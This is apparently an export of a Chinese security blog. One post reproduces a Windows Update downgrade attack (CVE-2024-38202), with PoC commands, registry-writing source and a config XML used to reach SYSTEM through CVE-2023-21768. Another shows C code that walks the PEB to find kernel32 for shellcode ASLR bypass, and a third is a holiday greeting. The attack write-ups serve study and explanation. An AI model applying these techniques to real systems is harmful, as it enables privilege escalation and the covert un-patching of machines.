<h2 id="PoC-工具下载"><a href="#PoC-工具下载" class="headerlink" title="PoC 工具下载"></a>PoC 工具下载</h2><p><a href="https://github.com/SafeBreach-Labs/WindowsDowndate">https://github.com/SafeBreach-Labs/WindowsDowndate</a><br>仓库中也提供了 PyInstaller 构建好的可执行程序。</p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>运行 <code>winver</code> 看一下版本：<code>Windows11 23H2 22631.3880</code><br><img src="https://bu.dusays.com/2024/08/22/66c6d05fe3c3b.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/22/66c6d05fe3c3b.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="winver"></p>
<p>以管理员权限运行PoC程序，降级到 <a href="https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768">CVE-2023-21768</a> 可攻击的环境（AFD 驱动）：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">./windows_downdate <span class="literal">--config-xml</span> examples/CVE<span class="literal">-2023-21768-AFD-Driver-EoP-Patch-Downgrade</span>/Config.xml</span><br></pre></td></tr></tbody></table></figure>
<p><img src="https://bu.dusays.com/2024/08/22/66c6d4265b3e8.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/22/66c6d4265b3e8.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="downdate"></p>
<p>需要重启，重启完成后运行cmd。<br>切换到 CVE-2023-21768 利用程序目录，运行 <code>whomai</code> 可知目前是普通用户。<br>找到当前 cmd 的 pid：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">tasklist | find <span class="string">"cmd.exe"</span></span><br></pre></td></tr></tbody></table></figure>
<p>运行 CVE-2023-21768 利用程序，指定要提升权限的进程为当前 cmd 进程：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">.\Windows_AFD_LPE_CVE<span class="literal">-2023-21768</span>.exe &lt;pid&gt;</span><br></pre></td></tr></tbody></table></figure>
<p><img src="https://bu.dusays.com/2024/08/22/66c6d44d44c4f.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/08/22/66c6d44d44c4f.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="exp"></p>
<p>再次运行 <code>whoami</code> 发现已经拿到 system 权限。</p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><blockquote>
<p>我能够使完全修补的 Windows 机器容易受到数千个过去漏洞的影响，将修复的漏洞变成零日漏洞，并使“完全修补”一词在世界上任何 Windows 机器上都毫无意义。</p>
</blockquote>
<h3 id="Windows-更新流程"><a href="#Windows-更新流程" class="headerlink" title="Windows 更新流程"></a>Windows 更新流程</h3><p>首先需要知道的是，Windows 的更新需要客户端管理权限，而更新服务器会运行受信任的安装程序来完成更新。即使是 SYSTEM 权限，也不能修改 Windows 更细节机制拥有的系统文件。</p>
<blockquote>
<p>Windows 更新流程包括以下步骤：</p>
<ol>
<li>首先，客户端要求服务器执行它提供的更新文件夹中包含的更新。</li>
<li>然后，服务器验证更新文件夹的完整性。</li>
<li>验证后，服务器将对更新文件夹进行操作，以完成更新文件。它们被保存到服务器控制的文件夹中，客户端无法访问该文件夹。</li>
<li>服务器将操作列表保存到服务器控制的文件夹中，客户端无法访问该文件夹。操作列表名为 Pending.xml，其中包含要执行的更新操作。例如，它指定要更新的文件、源文件和目标文件等。</li>
<li>最后，当操作系统重启时，将对操作列表进行操作，并在重启过程中执行更新操作。</li>
</ol>
</blockquote>
<p>其中第5步的更新是由受信任的安装程序在服务器端强制执行的，管理员想要提权到受信任安装程序权限会被 EDR（Endpoint Detection and Response） 阻止。因此想要<strong>代替更新服务器来完成更新是不可能的</strong>。</p>
<p>作者一开始的目标是更新文件夹中的差异文件。但是 manifest 里硬编码了更新文件的哈希值，而更改这个值会破坏 manifest 文件的签名（在 catalog 文件中）。</p>
<h3 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h3><p>于是作者把目标放在了<strong>操作列表</strong>（pending.xml）的修改上，并发现了注册表一个名为<code>PoqexecCmdline</code>的有趣的 key，它包含了一个可以解析操作列表和操作列表路径的可执行程序。其路径为<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Configuration\PoqexecCmdline</code>。</p>
<p>而且这个 key 不是由受信任的安装程序强制执行，意味着我们可以用<strong>管理员权限</strong>来修改添加这个key并修改其值。这个 key 的作用是什么呢？它标志着<strong>需要更新</strong>，受信任安装服务在检测到这个 key 后，会将其值作为命令执行，而这个命令可以用于解析操作列表及其路径，这意味着修改这个 key 也就<strong>完全控制了操作列表</strong>。<br>源代码中定义：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">register_poqexec_cmd</span>(<span class="params">poqexec_cmd: <span class="built_in">str</span></span>) -&gt; <span class="literal">None</span>:</span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    Registers the PoqexecCmdLine registry key containing the Pending.xml path</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    :param poqexec_cmd: The PoqExec.exe command line. Usually it is as follows -</span></span><br><span class="line"><span class="string">        path/to/poqexec.exe params pending_xml_nt_path</span></span><br><span class="line"><span class="string">    :return: None</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    set_reg_value(winreg.HKEY_LOCAL_MACHINE,</span><br><span class="line">                  SIDE_BY_SIDE_CONFIGURATION_REGISTRY_PATH,</span><br><span class="line">                  <span class="string">"PoqexecCmdline"</span>,</span><br><span class="line">                  [poqexec_cmd],</span><br><span class="line">                  winreg.REG_MULTI_SZ)</span><br></pre></td></tr></tbody></table></figure>
<p>源代码中调用：</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">pend_update</span>(<span class="params">pending_xml_path: <span class="built_in">str</span>, impersonate_ti: <span class="built_in">bool</span></span>) -&gt; <span class="literal">None</span>:</span><br><span class="line">    ...</span><br><span class="line">    poqexec_path_exp = os.path.expandvars(POQEXEC_PATH)</span><br><span class="line">    poqexec_cmd = <span class="string">f"<span class="subst">{poqexec_path_exp}</span> /display_progress \\??\\<span class="subst">{pending_xml_path}</span>"</span></span><br><span class="line">    register_poqexec_cmd(poqexec_cmd)</span><br></pre></td></tr></tbody></table></figure>

<p>可以发现程序生成了一行完整的<code>poqexec.exe</code>命令并将其写为了这个 key 的值，其中<code>pending_xml_path</code>也由我们控制，其相应文件中内容就是我们之前运行的命令中<code>--config-xml</code>选项后指定的 xml 文件内容。</p>
<p>这个xml，即操作列表（pending.xml）提供创建文件、删除文件、移动文件、硬链接文件、创建注册表键和值、删除键和值等功能。例如，为了降级，可以使用硬链接文件操作，source 文件将替换 destination：</p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">HardlinkFile</span> <span class="attr">source</span>=<span class="string">"C:\UpdateDir\Source.exe"</span> <span class="attr">destination</span>=<span class="string">"C:\Windows\System32\Destination.exe"</span>/&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>将 destination 设置为要降级的目标文件，将 source 替换为降级后的文件即可。</p>
<h3 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h3><p>攻击的主要思想就是修改操作列表。但是还需要经过一些验证/找到触发更新操作的方式，主要流程如下：</p>
<ol>
<li>将受信任安装服务设置为自启动，这样重启系统后会检查是否需要更新</li>
<li>在注册表中添加<code>PoqexecCmdline</code>及相应的值，<strong>指定操作列表路径</strong></li>
<li>添加操作列表的标识符<br>标识符是一个动态数字，出于完整性目的，将它与操作列表的标识符进行比较。从代码中可以看到，在 xml 中设置的标识符要和在注册表中 PendingXmlIdentifier 的值一样。<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">PENDING_XML_IDENTIFIER = <span class="string">"916ae75edb30da0146730000dc1be027"</span></span><br><span class="line"></span><br><span class="line">EMPTY_PENDING_XML = <span class="string">f"""&lt;?xml version='1.0' encoding='utf-8'?&gt;\n</span></span><br><span class="line"><span class="string">&lt;PendingTransaction Version="3.1" WcpVersion="10.0.22621.2567 (WinBuild.160101.0800)" Identifier="<span class="subst">{PENDING_XML_IDENTIFIER}</span>"&gt;</span></span><br><span class="line"><span class="string">...</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line">...</span><br><span class="line">set_pending_xml_identifier(PENDING_XML_IDENTIFIER)</span><br></pre></td></tr></tbody></table></figure>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">set_pending_xml_identifier</span>(<span class="params">pending_xml_identifier: <span class="built_in">str</span></span>) -&gt; <span class="literal">None</span>:</span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    Sets the Pendning.xml identifier in registry</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    :param pending_xml_identifier: The Pending.xml identifier</span></span><br><span class="line"><span class="string">    :return: None</span></span><br><span class="line"><span class="string">    :note: This API assumes the COMPONENTS hive is loaded to the registry</span></span><br><span class="line"><span class="string">    :note: If this identifier is not equal to the Pending.xml identifier, PoqExec.exe will fail parsing Pending.xml</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    pending_xml_identifier_bytes = <span class="built_in">bytes</span>(pending_xml_identifier, <span class="string">"utf-8"</span>)</span><br><span class="line">    pending_xml_identifier_unicode = <span class="string">b"\x00"</span>.join(<span class="built_in">bytes</span>([byte]) <span class="keyword">for</span> byte <span class="keyword">in</span> pending_xml_identifier_bytes) + <span class="string">b"\x00"</span></span><br><span class="line">    set_reg_value(winreg.HKEY_LOCAL_MACHINE,</span><br><span class="line">                  <span class="string">"COMPONENTS"</span>,</span><br><span class="line">                  <span class="string">"PendingXmlIdentifier"</span>,</span><br><span class="line">                  pending_xml_identifier_unicode,</span><br><span class="line">                  winreg.REG_BINARY)</span><br></pre></td></tr></tbody></table></figure></li>
</ol>
<p>先前，在执行 PoC 代码后，我们重启并完成了对另一个漏洞的攻击。<br>在这个过程中：</p>
<ol>
<li>Windows 更新机制中的受信任安装服务自启动</li>
<li>检测到<code>PoqexecCmdline</code>，执行其中命令设置<strong>操作列表</strong>路径</li>
<li>受信任安装程序根据我们构建的 xml 文件进行更新，导致文件被替换成低版本脆弱文件</li>
<li>降级攻击完成</li>
</ol>
<p>由于这个过程被 Windows 更新机制接管，因此十分隐蔽。</p>
<h3 id="更多"><a href="#更多" class="headerlink" title="更多"></a>更多</h3><p>原文中还提到绕过 VBS(Virtualization-Based Security) UEFI 锁等内容，这里只对降级攻击做简单介绍，感兴趣可以看原文。</p>
<h2 id="自定义降级攻击"><a href="#自定义降级攻击" class="headerlink" title="自定义降级攻击"></a>自定义降级攻击</h2><blockquote>
<p>Windows 降级支持制作自定义降级。要制作自定义降级，你需要创建一个配置 XML 文件，然后将此配置 XML 输入工具即可。</p>
</blockquote>
<p>在 CVE-2023-21768 的攻击中，我们用到的 XML 文件如下：</p>
<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">Configuration</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">UpdateFilesList</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">UpdateFile</span> <span class="attr">source</span>=<span class="string">"%CWD%\examples\CVE-2023-21768-AFD-Driver-EoP-Patch-Downgrade\UpdateFiles\afd.sys"</span> <span class="attr">destination</span>=<span class="string">"C:\Windows\System32\Drivers\afd.sys"</span> /&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">UpdateFilesList</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">Configuration</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>原理非常简单，就是定义用于替换的文件路径和目标文件路径。<br>只要是 Windows 下与系统文件版本有关的漏洞就可以自定义降级攻击。</p>
<h2 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h2><p>Windows 对于安全边界的划分似乎总是异于常人啊。。。</p>
<blockquote>
<p>Max Severity: Important</p>
<p>Attack Complexity: Low</p>
<p>Privileges Required: Low</p>
<p>Exploit Code Maturity: Proof-of-Concept</p>
<p>Remediation Level: Unavailable</p>
</blockquote>
<p>前几条和最后一条竟能同时出现在同一则<a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38202">安全公告</a>中，真乃神人也。</p>
]]></content>
      <categories>
        <category>系统安全</category>
      </categories>
      <tags>
        <tag>CVE</tag>
        <tag>nday</tag>
        <tag>Windows</tag>
        <tag>更新机制</tag>
      </tags>
  </entry>
  <entry>
    <title>Windows PEB 利用</title>
    <url>/posts/windows-peb-walkthrough/</url>
    <content><![CDATA[<h2 id="ASLR"><a href="#ASLR" class="headerlink" title="ASLR"></a>ASLR</h2><p>ASLR，全称 Address space layout randomization，即地址空间配置随机加载。多数现代的应用程序都会开启 ASLR。目的是防止攻击者事先获知程序的虚拟内存地址，防止攻击者能可靠地跳转到内存的特定位置来利用函数。</p>
<p>在Linux中，ASLR 的实现方式是同一个应用程序每次启动都会被加载到不同的位置。而在 Windows 中，只能保证系统重启后地址的随机性。</p>
<p>究其原因，是对性能和安全性权衡后的结果。由于 Windows 不采用 PIE，因此其 ASLR 的实现需要付出内存代价。 每次将库映射到不同地址时，都会占用更多内存。</p>
<p>当然这也意味着，如果我们在某台 Windows 机器上获取了一次库函数的虚拟地址，在其重启之前，我们都能够继续使用。</p>
<h2 id="PEB"><a href="#PEB" class="headerlink" title="PEB"></a>PEB</h2><p>在 Linux 中，内核通过<code>task_struct</code>保存并管理进程相关的信息，在 Windows 中起到类似作用的是PEB。当然，还是有许多不同之处。例如 PEB 在用户态中而 <code>task_struct</code>在内核态中。</p>
<blockquote>
<p><strong>进程环境块</strong>（<strong>PEB</strong>）是 <a href="https://zh.wikipedia.org/wiki/Windows_NT">Windows NT</a><a href="https://zh.wikipedia.org/wiki/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F">操作系统</a>内部使用的数据结构，用以存储每个进程的运行时数据。</p>
</blockquote>
<p>维基百科对 PEB 的描述足够全面，推荐感兴趣的读者继续阅读，值得注意的是中文翻译有些瑕疵。说回到 PEB，PEB 是一个结构体，包含了进程是否被调试、被加载模块的虚拟地址等大量信息。</p>
<p>在 Windows 11 23H2 (2023 Update) 版本的内核中，PEB 的部分定义如下：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">//0x7d0 bytes (sizeof)</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> _<span class="title">PEB</span></span></span><br><span class="line"><span class="class">{</span></span><br><span class="line">    UCHAR InheritedAddressSpace;                                            <span class="comment">//0x0</span></span><br><span class="line">    UCHAR ReadImageFileExecOptions;                                         <span class="comment">//0x1</span></span><br><span class="line">    UCHAR BeingDebugged;                                                    <span class="comment">//0x2</span></span><br><span class="line">    <span class="class"><span class="keyword">union</span></span></span><br><span class="line"><span class="class">    {</span></span><br><span class="line">        UCHAR BitField;                                                     <span class="comment">//0x3</span></span><br><span class="line">        <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">        {</span></span><br><span class="line">            UCHAR ImageUsesLargePages:<span class="number">1</span>;                                    <span class="comment">//0x3</span></span><br><span class="line">            UCHAR IsProtectedProcess:<span class="number">1</span>;                                     <span class="comment">//0x3</span></span><br><span class="line">            UCHAR IsImageDynamicallyRelocated:<span class="number">1</span>;                            <span class="comment">//0x3</span></span><br><span class="line">            UCHAR SkipPatchingUser32Forwarders:<span class="number">1</span>;                           <span class="comment">//0x3</span></span><br><span class="line">            UCHAR IsPackagedProcess:<span class="number">1</span>;                                      <span class="comment">//0x3</span></span><br><span class="line">            UCHAR IsAppContainer:<span class="number">1</span>;                                         <span class="comment">//0x3</span></span><br><span class="line">            UCHAR IsProtectedProcessLight:<span class="number">1</span>;                                <span class="comment">//0x3</span></span><br><span class="line">            UCHAR IsLongPathAwareProcess:<span class="number">1</span>;                                 <span class="comment">//0x3</span></span><br><span class="line">        };</span><br><span class="line">    };</span><br><span class="line">    UCHAR Padding0[<span class="number">4</span>];                                                      <span class="comment">//0x4</span></span><br><span class="line">    VOID* Mutant;                                                           <span class="comment">//0x8</span></span><br><span class="line">    VOID* ImageBaseAddress;                                                 <span class="comment">//0x10</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> _<span class="title">PEB_LDR_DATA</span>* <span class="title">Ldr</span>;</span>                                              <span class="comment">//0x18</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> _<span class="title">RTL_USER_PROCESS_PARAMETERS</span>* <span class="title">ProcessParameters</span>;</span>                 <span class="comment">//0x20</span></span><br><span class="line">    VOID* SubSystemData;                                                    <span class="comment">//0x28</span></span><br><span class="line">    VOID* ProcessHeap;                                                      <span class="comment">//0x30</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> _<span class="title">RTL_CRITICAL_SECTION</span>* <span class="title">FastPebLock</span>;</span>                              <span class="comment">//0x38</span></span><br><span class="line">    <span class="class"><span class="keyword">union</span> _<span class="title">SLIST_HEADER</span>* <span class="title">volatile</span> <span class="title">AtlThunkSListPtr</span>;</span>                         <span class="comment">//0x40</span></span><br><span class="line">    VOID* IFEOKey;                                                          <span class="comment">//0x48</span></span><br><span class="line">	……</span><br><span class="line">};</span><br></pre></td></tr></tbody></table></figure>

<p>在本文中，我们主要关注偏移为 0x18 的 <strong>Ldr</strong> 字段。为什么？因为它包含了被加载模块（用到的库）的虚拟地址。</p>
<h2 id="Ldr-概览"><a href="#Ldr-概览" class="headerlink" title="Ldr 概览"></a>Ldr 概览</h2><p>在利用之前，或许应该先看看这个字段包含什么内容。我先在 Windbg 中随机打开一个应用程序看看 PEB 及 Ldr 的内容。</p>
<p><img src="https://bu.dusays.com/2024/03/16/65f56cd47e02d.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/03/16/65f56cd47e02d.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="lm"></p>
<p>在命令框中键入<code>lm</code>，即 list modules，可以看到这个应用加载了5个模块。其中<code>a</code>是程序本身的名字（a.exe），而<code>KERNEL32</code>是我们关心的另一个模块，因为它控制着系统的内存管理、数据的输入输出操作和中断处理，或者换句话说，其中有许多我们可以利用的函数（如<code>WriteFile()</code>用来写）。在不使用调试工具的时候我们无法如此便捷地获取被加载模块的地址，因此我们需要用到 PEB。</p>
<p>在 Windbg 中也可以很方便地查看 PEB 信息：</p>
<p><img src="https://bu.dusays.com/2024/03/16/65f56e437cd9e.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/03/16/65f56e437cd9e.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="!peb"></p>
<p>在命令框中键入<code>!peb</code>可以看到 <code>Ldr.InMemoryOrderModuleList</code>下存储着被加载模块地基地址，其中第一个和第三个是我们的目标，其显示的基地址和之前使用<code>lm</code>命令查看到的地址是一致的。</p>
<p>值得一提的是，这些 Modules 正是以 List 链表形式存储的。我们简单地验证一下：</p>
<p><img src="https://bu.dusays.com/2024/03/16/65f57071c5d17.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/03/16/65f57071c5d17.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="list"></p>
<p>不难发现，在每个条目的开头存储着下一个条目的地址，而偏移 0x20 处存储着被加载模块的基地址。因此当我们表头的地址时，我们可以通过每个链表项跳转到下一个链表项、可以获取每个链表项下模块的基地址。</p>
<h2 id="PoC"><a href="#PoC" class="headerlink" title="PoC"></a>PoC</h2><p>接下来就是编写 C 代码获取被加载模块虚拟地址的 demo 了。我们先提出尚未解决的几个问题：</p>
<ol>
<li>如何获得 PEB 结构体在内存中的地址？</li>
<li>Ldr 相对 PEB 的偏移量已知是 0x18，Ldr.InMemoryOrderModuleList 相对 Ldr 的偏移是多少？</li>
</ol>
<p>先回答第二个问题：Ldr.InMemoryOrderModuleList 相对 Ldr 的偏移是 0x20 。并且在我们编写 C 代码的时候，不需要知道具体的偏移量，只需要知道字段名称即可，相应的库会帮我们处理好偏移量。</p>
<p>接着是第一个问题：Windows 用 FS/GS 寄存器来存储 PEB 的地址，分别对应32位/64位。具体如下：</p>
<ul>
<li>32位：fs:0x30</li>
<li>64位：gs:0x60</li>
</ul>
<p><code>:</code>后代表偏移量。</p>
<p>解决了这两个问题之后就可以编写 C 代码了：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;winnt.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;winternl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span> {</span><br><span class="line">    <span class="comment">// __readgsqword(0x60) equals to mov &lt;register&gt;, gs:[0x60]</span></span><br><span class="line">    PPEB pebPtr = (PPEB)__readgsqword(<span class="number">0x60</span>);</span><br><span class="line">    PPEB_LDR_DATA ldrData = pebPtr-&gt;Ldr;</span><br><span class="line">    PLIST_ENTRY moduleList = &amp;ldrData-&gt;InMemoryOrderModuleList;</span><br><span class="line">    <span class="comment">// Get the first module in the list</span></span><br><span class="line">    PLDR_DATA_TABLE_ENTRY program_module = CONTAINING_RECORD(moduleList-&gt;Flink, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Skip 3 modules to get kernel32.dll</span></span><br><span class="line">    moduleList = moduleList-&gt;Flink;</span><br><span class="line">    moduleList = moduleList-&gt;Flink;</span><br><span class="line">    moduleList = moduleList-&gt;Flink;</span><br><span class="line">    <span class="comment">// Get kernel32.dll</span></span><br><span class="line">    PLDR_DATA_TABLE_ENTRY kernel32_module = CONTAINING_RECORD(moduleList, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);</span><br><span class="line">    PVOID program_base = program_module-&gt;DllBase;</span><br><span class="line">    PVOID kernel32_base = kernel32_module-&gt;DllBase;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Program base: %p\n"</span>, program_base);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Kernel32 base: %p\n"</span>, kernel32_base);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>简单地解释一下流程：</p>
<ol>
<li>通过 <code>gs</code> 寄存器获取 <code>PEB</code> 地址</li>
<li>通过 <code>PEB</code> 结构体获取 <code>Ldr</code></li>
<li>通过 <code>Ldr</code> 获取 <code>InMemoryOrderModuleList</code></li>
<li><code>Flink</code> 一次将取出表头，在固定的偏移处可以取出程序基地址</li>
<li><code>Flink</code> 3次将取出第三项，在同样的偏移处可以取出 <code>Kernel32.dll</code> 的基地址</li>
</ol>
<p>编译成可执行文件并运行：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">gcc poc.c</span><br><span class="line">./a.exe</span><br></pre></td></tr></tbody></table></figure>

<p>得到输出：</p>
<figure class="highlight powershell"><table><tbody><tr><td class="code"><pre><span class="line">Program base: <span class="number">0000000000400000</span></span><br><span class="line">Kernel32 base: <span class="number">00007</span>FFEBE4B0000</span><br></pre></td></tr></tbody></table></figure>

<p>发现与在 Windbg 中得到的一致。</p>
<p>这证明：我们可以通过编写 C 代码获得被加载模块的基地址。更进一步地，我们的 C 代码经过编译后反汇编得到的汇编代码简单清晰，这意味着我们可以编写比较简单的汇编来实现这一目标。换言之，我们可以在 shellcode 中实现这一目标从而绕过 ASLR。</p>
]]></content>
      <categories>
        <category>系统安全</category>
      </categories>
      <tags>
        <tag>Windows</tag>
        <tag>ASLR</tag>
        <tag>shellcode</tag>
        <tag>PoC</tag>
      </tags>
  </entry>
  <entry>
    <title>冬至安康</title>
    <url>/posts/winter-solstice/</url>
    <content><![CDATA[<p>春生冬至时，祝各位博友冬至安康！<span id="more"></span></p>
<div galleryflag="" itemscope="" itemtype="http://schema.org/ImageGallery" class="gallery " data-group="default"><div class="fancybox"><a class="fancybox" itemscope="" itemtype="http://schema.org/ImageObject" itemprop="url" href="https://bu.dusays.com/2022/12/22/63a4360f12dcc.png" data-fancybox="default" data-caption="自己设计的冬至海报"><img fancybox="" itemprop="contentUrl" src="https://bu.dusays.com/2022/12/22/63a4360f12dcc.png" class="lazyload" data-srcset="https://bu.dusays.com/2022/12/22/63a4360f12dcc.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="自己设计的冬至海报"></a><span class="image-caption">自己设计的冬至海报</span></div></div>]]></content>
      <categories>
        <category>生活</category>
      </categories>
      <tags>
        <tag>设计</tag>
        <tag>海报</tag>
        <tag>节日</tag>
      </tags>
  </entry>
</search>